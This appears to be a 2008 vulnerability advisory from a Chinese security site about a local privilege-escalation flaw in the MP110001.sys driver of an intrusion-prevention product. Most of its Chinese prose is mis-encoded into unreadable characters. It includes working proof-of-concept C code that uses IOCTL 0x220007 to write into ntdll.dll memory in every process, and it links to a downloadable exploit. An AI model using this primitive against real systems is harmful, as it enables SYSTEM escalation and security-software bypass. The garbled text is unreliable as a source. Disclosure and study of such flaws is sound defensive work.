Ê×Ò³ | °²È«ÎÄÕ | °²È«¹¤¾ß | Exploits | ±¾Õ¾Ô­´´ | ¹ØÓÚÎÒÃÇ | ÍøÕ¾µØͼ | °²È«ÂÛ̳
  µ±Ç°Î»ÖãºÖ÷Ò³>°²È«ÎÄÕÂ>ÎÄÕÂ×ÊÁÏ>©¶´×ÊÁÏ>ÎÄÕÂÄÚÈÝ
΢µãÖ÷¶¯·ÀÓù£¨version20081008)¼°ÒÔϱ¾µØȨÏÞÌáÉý©¶´£¨userȨÏÞÏÂÈƹýUAC¡¢Ö÷¶¯·ÀÓ
À´Ô´£ºhttp://hi.baidu.com/mj0011 ×÷ÕߣºMJ0011 ·¢²¼Ê±¼ä£º2008-10-09  

×÷ÕߣºMJ0011

΢µãÖ÷¶¯·ÀÓùÊÇÒ»¿îºÅ³ÆʹÓÃÐÐΪ·ÖÎö¼¼Êõʵʱ±£»¤µÄÖ÷¶¯·ÀÓùÈí¼þ¡£

ÆäºËÐÄÇý¶¯MP110001.SYS×îа汾´æÔÚ±¾µØȨÏÞÌáÉý©¶´£¬¿Éµ¼ÖÂÈκÎȨÏÞµÄÓû§ÔÚ±¾µØÌáÉýȨÏÞµ½SYSTEMȨÏÞ£¬ÈƹýUACµÈ±£»¤¡£Í¬Ê±Ò²¿ÉÒÔÀûÓôË©¶´×¢Èëµ½ÈκÎÊܱ£»¤½ø³Ì£¬´Ó¶ø´©Í¸·À»ðǽ¡¢Ö÷¶¯·ÀÓùÈí¼þ¡£

³öÎÊÌâµÄ×é¼þ£ºMP110001.sys,°æ±¾ºÅ£º1.2.10006 CheckSum = 0x00009F60 TimeStamp = 0x43620505

¸ÃÇý¶¯ÌṩÁËÒ»¸ö½Ó¿Ú£¬ÔÊÐíRING3³ÌÐò½«Ò»¿éÊý¾ÝCOPYµ½µØÖ·0-0x80000000µÄÈÎÒâ µØÖ·£¬ÔÚдÈëʱ»á½«¼Ä´æÆ÷CR0µÄµÚ16λÖÃ0£¬´ËʱCPUµÄÒ³±£»¤»úÖƾͻáʧЧ£¬WINDOWS NT µÄCopyOnWrite»úÖÆÒ²½«Ê§Ð§£¬RING3³ÌÐò¿ÉÒÔ½«ÄÚ´æдÈ뵽ϵͳģ¿é£¬ÀýÈçkernel32.dll, user32.dllµÄµØÖ·£¬¸ÄдËüÃǵĴúÂ룬´Ëʱ¶ÔϵͳDLL´úÂëµÄ¸Äд»áÔÚËùÓнø³ÌÌåÄÚͬʱÉúЧ.

ͨ¹ýÕâÒ»½Ó¿Ú£¬ÈκÎȨÏÞµÄRING3³ÌÐò¾Í¿ÉÒÔHOOK»òÅÔ·ϵͳÈκνø³ÌµÄº¯Êýµ÷Ó㬴Ӷø½øÐÐȨÏÞÌáÉý£¬Èç¹ûHOOK½øÖ÷¶¯·ÀÓù¡¢·À»ðǽµÈµÄ½ø³ÌÌåÄÚ£¬Ôò¿ÉÈƹýÖ÷¶¯·ÀÓùÈí¼þµÄ±£»¤¡£

²âÊÔ´úÂ룺
HANDLE hdev = CreateFile("\\\\.\\MP110001" ,
FILE_READ_ATTRIBUTES ,
FILE_SHARE_READ |FILE_SHARE_WRITE ,
0,
OPEN_EXISTING ,
0,
0);

if (hdev == INVALID_HANDLE_VALUE)
{

CHAR xx[100];
sprintf(xx , "create err = %u\n" , GetLastError());
MessageBox(xx, 0 , 0 );
return ;
}

CHAR xx[] = "hello mp!";

HMODULE p = GetModuleHandle("ntdll.dll");

ULONG btr ;

BOOL bret = DeviceIoControl(hdev ,
0x220007,
(PVOID)((ULONG)p + 2 ),
strlen(xx)+1 ,
xx,
0,
&btr ,
0
);

CloseHandle(hdev);

²âÊÔ´úÂë»áÏòNTDLL.DLLµÄDOSÍ·µÚ¶þ¸ö×Ö½Ú¿ªÊ¼Ð´ÈëÒ»¸ö×Ö·û´®“hello mp"£¬´ËÐ޸Ľ«ÔÚϵͳÈκνø³ÌÌåÄÚÉúЧ£¬¿ÉʹÓÃOD¡¢WINDBG,WINHEXµÈ¹¤¾ß²é¿´

²âÊÔ³ÌÐòÏÂÔØ£ºhttp://mj0011.ys168.com ©¶´ÑÝʾĿ¼ÏÂLOCALexp_MP.rar


 
[ÍƼö] [ÆÀÂÛ(0Ìõ)] [·µ»Ø¶¥²¿] [´òÓ¡±¾Ò³] [¹Ø±Õ´°¿Ú]  
ÄäÃûÆÀÂÛ
ÆÀÂÛÄÚÈÝ£º(²»Äܳ¬¹ý250×Ö£¬ÐèÉóºËºó²Å»á¹«²¼£¬Çë×Ô¾õ×ñÊØ»¥ÁªÍøÏà¹ØÕþ²ß·¨¹æ¡£
 ¡ì×îÐÂÆÀÂÛ£º
  ÈȵãÎÄÕÂ
¡¤XSOK»·¾³±äÁ¿±¾µØÃüÁîÖ´ÐЩ¶´
¡¤NµãÐéÄâÖ÷»ú¹ÜÀíϵͳ ÖÂÃü©¶´¡£
¡¤ÄÏ·½Êý¾ÝÆóÒµÍøÕ¾¹ÜÀíϵͳV10.0
¡¤¶¯Íø£¨DVBBS£©Version 8.2.0 ºó
¡¤Solaris 10 telnet©¶´¼°½â¾ö
¡¤ÆƽâÎÞÏß·ÓÉÆ÷ÃÜÂ룬³£¼ûÎÞÏßÃÜ
¡¤Nginx %00¿Õ×Ö½ÚÖ´ÐÐphp©¶´
¡¤WinWebMail¡¢7I24ÌáȨ©¶´
¡¤XPCD xpcd-svga±¾µØ»º³åÇøÒç³ö©
¡¤Struts2¶à¸ö©¶´¼òÒª·ÖÎö
¡¤ecshop2.72 api.php Îļþ¼¦Àß×¢
¡¤Discuz!ºǫ́ÄÃWebshell 0day
  Ïà¹ØÎÄÕÂ
¡¤ÖÐÍøS3Ö÷»ú°²È«ÏµÍ³2008°æ±¾3.5.
¡¤Adobe Flash PlayerδÃ÷µã»÷½Ù³Ö
¡¤php utf8 decode©¶´
¡¤dedecms5.1×îЩ¶´
¡¤DEDECMS¿çÕ¾¼°±¬¾ø¶Ô·¾¶Â©¶´
¡¤¶à¿îRSSÔĶÁÆ÷³öÏÖXSS©¶´
¡¤¸ßΣͨ¸æ:¹úÄÚ90%Óʼþ·þÎñÉÌ´æÔÚ
¡¤Mozilla FireFox <= 2.0.16 UTF8
¡¤°Ù¶ÈHi CsrfÈä³æ¹¥»÷
¡¤Microsoft SQL Server sqlvdir.d
¡¤Microsoft SQL Server sqlvdir.d
¡¤QQ¿Í»§¶ËÍøÕ¾Á´½Ó¹ýÂ˲»ÑϿɵ¼ÖÂ
  ÍƼö¹ã¸æ
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved